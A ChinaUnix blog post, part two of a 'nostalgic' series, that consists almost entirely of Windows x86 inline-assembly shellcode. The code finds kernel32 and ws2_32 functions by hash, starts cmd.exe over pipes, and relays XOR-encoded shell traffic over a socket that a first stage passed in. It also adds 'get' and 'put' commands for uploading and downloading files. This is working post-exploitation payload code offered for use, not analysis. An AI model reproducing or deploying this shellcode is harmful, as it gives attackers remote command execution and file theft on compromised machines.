Chinaunix首页 | 论坛 | 博客

aullik5的ChinaUnix博客

首页 |  博文目录 |  关于我

aullik5

  • 博客访问: 1198951
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

我的朋友
最近访客
推荐博文
相关博文
怀旧:文件上传下载的shellcode(part 2)

分类: 服务器与存储

2012-06-26 13:19:21


点击(此处)折叠或打开

  1. // shellcode function
  2. void ShellCode()
  3. {
  4. __asm{
  6. PROC_BEGIN //C macro to begin proc
  8. jmp locate_addr
  9. func_start:
  10. pop edi ; get eip
  11. mov dword ptr [edi+_hsck], eax //保存stage1传来的socket handle
  13. mov eax, fs:30h
  14. mov eax, [eax+0Ch]
  15. mov esi, [eax+1Ch]
  16. lodsd
  17. mov ebp, [eax+8] ; base address of kernel32.dll
  19. mov esi, edi
  21. push _Knums
  22. pop ecx
  24. GetKFuncAddr: ; find functions from kernel32.dll
  25. call find_hashfunc_addr
  26. loop GetKFuncAddr
  28. push 3233h
  29. push 5F327377h ; ws2_32
  30. push esp
  31. call dword ptr [esi+_LoadLibraryA]
  32. mov ebp, eax ; base address of ws2_32.dll
  33. push _Wnums
  34. pop ecx
  36. GetWFuncAddr: ; find functions from ws2_32.dll
  37. call find_hashfunc_addr
  38. loop GetWFuncAddr
  40. push 1 ; sa.inherit=true
  41. push 0 ; sa.descriptor=NULL
  42. push 0x0C ; sa.sizeof(sa)=0x0c
  43. mov ebx, esp
  45. push 0xff
  46. push ebx
  47. lea edx, [esi+_hin0]
  48. push edx
  49. add edx, 4
  50. push edx
  51. call dword ptr [esi+_CreatePipe]
  53. push 0x305C
  54. push 0x65706970
  55. push 0x5C2E5C5C ; "\\.\pipe\0"
  56. mov edi, esp
  58. xor eax, eax
  59. push eax
  60. push eax
  61. push eax
  62. push eax
  63. push 0xff ; UNLIMITED_INSTANCES
  64. push eax ; TYPE_BYTE|READMODE_BYTE|WAIT
  65. push 0x40000003 ; ACCES_DUPLEX|FLAG_OVERLAPPED
  66. push edi ; pip="\\.\pipe\0"
  67. call dword ptr [esi+_CreateNamedPipeA]
  68. mov [esi+_hout1], eax
  70. xor eax, eax
  71. push eax
  72. push eax
  73. push 3 ; OPEN_EXISTING
  74. push ebx ; lap
  75. push eax
  76. push 0x02000000 ; MAXIMUM_ALLOWED
  77. push edi ; pip="\\.\pipe\0"
  78. call dword ptr [esi+_CreateFileA]
  79. mov [esi+_hout0], eax
  81. push 646D63h ; "cmd"
  82. lea edx, [esp]
  84. sub esp, 54h
  85. mov edi, esp
  86. push 14h
  87. pop ecx
  88. xor eax, eax
  89. stack_zero:
  90. mov [edi+ecx*4], eax
  91. loop stack_zero
  93. mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si)
  94. inc byte ptr [edi+3Ch]
  95. inc byte ptr [edi+3Dh] ; si.flg=USESHOWWINDOW|USESTDHANDLES
  96. push [esi+_hin1]
  97. pop ebx
  98. mov [edi+48h], ebx ; si.stdinput
  99. push [esi+_hout0]
  100. pop ebx
  101. mov [edi+4Ch], ebx ; si.stdoutput
  102. mov [edi+50h], ebx ; si.stderror
  103. lea eax, [edi+10h]
  105. push edi
  106. push eax
  107. push ecx
  108. push ecx
  109. push ecx
  110. push 1 ; inherit=TRUE
  111. push ecx
  112. push ecx
  113. push edx ; "cmd"
  114. push ecx
  115. call dword ptr [esi+_CreateProcessA]
  117. push [edi]
  118. pop dword ptr [esi+_pi0]
  119. push [edi+4]
  120. pop dword ptr [esi+_pi1]
  122. push [esi+_hin1]
  123. call dword ptr [esi+_CloseHandle]
  124. push [esi+_hout0]
  125. call dword ptr [esi+_CloseHandle]
  127. add esp, 0x6C ; free sa struct and "\\.\pipe\0" string and si struct
  129. xor eax, eax
  130. push eax
  131. push 1
  132. push 1
  133. push eax
  134. call dword ptr [esi+_CreateEventA]
  135. mov [esi+_epip], eax
  137. xor ebx, ebx
  138. mov [esi+_lap+0x0C], ebx
  139. mov [esi+_lap+0x10], eax
  141. call dword ptr [esi+_WSACreateEvent] // WSACreateEvent();
  142. mov [esi+_esck], eax
  143. mov dword ptr [esi+_flg], 0
  145. k1:
  146. push 0x21 ; FD_READ|FD_CLOSE
  147. push [esi+_esck]
  148. push [esi+_hsck]
  149. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);
  151. xor eax, eax
  152. dec eax
  153. push eax
  154. inc eax
  155. push eax
  156. lea ebx, [esi+_epip]
  157. push ebx
  158. push 2
  159. call dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
  160. push eax
  162. lea ebx, [esi+_sbuf]
  163. push ebx
  164. push [esi+_esck]
  165. push [esi+_hsck]
  166. call dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);
  168. push 0
  169. push dword ptr [esi+_esck]
  170. push dword ptr [esi+_hsck]
  171. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);
  173. push 0
  174. push esp
  175. push 0x8004667e
  176. push [esi+_hsck]
  177. call dword ptr [esi+_ioctlsocket]
  178. pop eax
  180. pop ecx ;
  181. jecxz k2
  182. dec ecx
  183. jnz k5
  185. push 0
  186. push 0x40
  187. lea edx, [esi+_sbuf]
  188. push edx
  189. push [esi+_hsck]
  190. call dword ptr [esi+_recv]
  192. lea edx, [esi+_sbuf]
  193. push eax
  194. pop ecx ;ecx字节数
  195. call xor_data
  197. //+-------------------------------------------
  198. // Add file download and upload function
  199. // 2004-06-09
  200. //
  201. // san
  202. //+-------------------------------------------
  203. cmp dword ptr [esi+_sbuf], 0xFF746567 ; "get "
  204. jz get_file
  205. cmp dword ptr [esi+_sbuf], 0xFF747570 ; "put "
  206. jz put_file
  207. cmp DWORD ptr [esi+_sbuf], 0x20786573 ; "*** " ***加空格, 安全退出
  208. jz k5
  210. restore:
  211. push 0
  212. lea ebx, [esi+_cnt]
  213. push ebx
  214. push eax ; size
  215. lea ebx, [esi+_sbuf]
  216. push ebx
  217. push [esi+_hin0]
  218. call [esi+_WriteFile] // WriteFile(_hin0, _sbuf, len, _cnt);
  220. k2:
  221. mov ecx, [esi+_flg]
  222. jecxz k3
  223. push eax
  224. lea ebx, [esi+_cnt]
  225. push ebx
  226. lea ebx, [esi+_lap]
  227. push ebx
  228. push [esi+_hout1]
  229. call dword ptr [esi+_GetOverlappedResult]
  230. xchg eax, ecx
  231. jecxz k5
  232. jmp k4
  234. k3:
  235. lea ebx, [esi+_lap]
  236. push ebx
  237. lea ebx, [esi+_cnt]
  238. push ebx
  239. push 0x40
  240. lea ebx, [esi+_pbuf]
  241. push ebx
  242. push [esi+_hout1]
  243. call dword ptr [esi+_ReadFile]
  244. inc dword ptr [esi+_flg]
  245. test eax, eax
  246. jz k1
  248. k4:
  249. lea edx, [esi+_pbuf]
  250. push [esi+_cnt]
  251. pop ecx
  252. call xor_data
  254. dec dword ptr [esi+_flg]
  255. push 0
  256. mov ebx, [esi+_cnt]
  257. push ebx
  258. lea ebx, [esi+_pbuf]
  259. push ebx
  260. push [esi+_hsck]
  261. call dword ptr [esi+_send]
  262. jmp k1
  264. k5:
  265. //int 3
  266. //push 0 //应该可以没有
  267. push [esi+_pi0] // 进程 handler
  268. call dword ptr [esi+_TerminateProcess] //结束掉cmd
  269. // call dword ptr [esi+_ExitThread]
  270. // call DWORD ptr [esi+_ExitProcess]
  272. push [esi+_pi0]
  273. push [esi+_pi1]
  274. push [esi+_hout1]
  275. push [esi+_hin0]
  276. call dword ptr [esi+_CloseHandle]
  277. call dword ptr [esi+_CloseHandle]
  278. call dword ptr [esi+_CloseHandle]
  279. call dword ptr [esi+_CloseHandle]
  281. push [esi+_hsck]
  282. call dword ptr [esi+_closesocket]
  284. // xor eax, eax
  285. // dec eax
  286. // push eax
  287. // call dword ptr [esi+_TerminateProcess] 结束当前进程
  288. // call dword ptr [esi+_ExitThread]
  290. // 返回stage1 恢复栈平衡
  291. //int 3
  292. add esp, 8h
  293. retn

阅读(1241) | 评论(0) | 转发(0) |
0

上一篇:怀旧:文件上传下载的shellcode(part 1)

下一篇:怀旧:文件上传下载的shellcode(part 3)

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6